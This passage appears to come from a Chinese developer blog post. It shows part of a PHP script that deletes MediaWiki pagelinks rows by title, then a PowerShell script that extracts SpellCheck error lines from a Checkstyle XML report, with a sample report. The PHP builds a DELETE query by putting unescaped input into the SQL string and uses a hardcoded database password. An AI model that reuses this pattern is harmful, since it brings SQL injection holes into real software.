$sql = "delete FROM `pagelinks` WHERE `pl_title` = '$title'";
mysql_query( $sql );
echo "Record Deleted: " . mysql_affected_rows() . "\n";
}

function main(){
$link = mysql_connect( 'Server', 'wiki', 'passwd' ) or die( 'Could not connect' . mysql_error() );
mysql_select_db( 'wiki' );
//deleteTitle('规范参考/技术类/语法检查/CheckStyle/AbstractBase/公共属性列表');

$handle = fopen("Noname2", "r");
while (!feof($handle)) {
$item = fgets($handle);
$item = str_replace("\r\n", '', $item);
echo $item . "\n";
deleteTitle($item);
}
fclose($handle);

/*$title = "ruts2Adapter替换I18nStrut";
showTitle($title);*/
//findDeadLinks('规范参考/技术类');
mysql_close( $link );
}
main()
?>

利用PowerShell截取Checkstyle关于bSpell拼写检查的当前错误行的源文件内容

ps1

go{
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
    $gbk = [System.Text.Encoding]::GetEncoding("GBK")
$utf8 = [System.Text.Encoding]::UTF8

$result = 'spell-filter.txt'
$encoding = [System.Text.Encoding]::GetEncoding("GBK")
rm $result -ea SilentlyContinue
$xml = cat checkstyle.xml
$xml = [xml]$xml # 类型转换
$xml.checkstyle.file|%{$_.error}|?{$_.source -match 'SpellCheck'}|
%{
$fileContent = cat $_.parentNode.name -total $_.line -ea SilentlyContinue # 文件有可能不存在,所以要【静音】
$word = (($_.message -replace 'The Spelling of word ', '') -replace 'may be illegal. .*', '') # 错误的拼写内容

if ($fileContent -ne $Null){
$code = $gbk.GetBytes($fileContent[-1]) # 错误的代码行
$code = $utf8.GetString($code)
'文件: ' + $_.parentNode.name + ' ,行号:' + $_.line + ' ,拼写错误:' + $word + ' ,代码:' + $code>> $result
}else{
'不存在的文件: ' + $_.parentNode.name + ' , ' + $_.line + ' , ' + $word
}
}
}

go

checkstyle.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="UTF-8"?>
<checkstyle version="5.0">
<file name="package_zh_CN.properties">
<error line="114" column="81" severity="error" message="The Spelling of word &quot;pageing&quot; may be illegal. The suggestion(s) include(s): [paging, ageing, panging, pugging, pegging]" source="SpellCheck"/>
<error line="117" column="84" severity="error" message="The Spelling of word &quot;pageing&quot; may be illegal. The suggestion(s) include(s): [paging, ageing, panging, pugging, pegging]" source="SpellCheck"/>
</file>
<file name="addOrDel.js">
<error line="1" severity="info" message="File length is 2,373 lines (max allowed is 2,000)." source="com.puppycrawl.tools.checkstyle.checks.sizes.FileLengthCheck"/>
</file>
<file name="showDataDictDetail.jsp">
<error line="10" column="19" severity="error" message="The Spelling of word &quot;stylesheet&quot; may be illegal. The suggestion(s) include(s): [StyleSheet]" source="SpellCheck"/>
</file>
</checkstyle>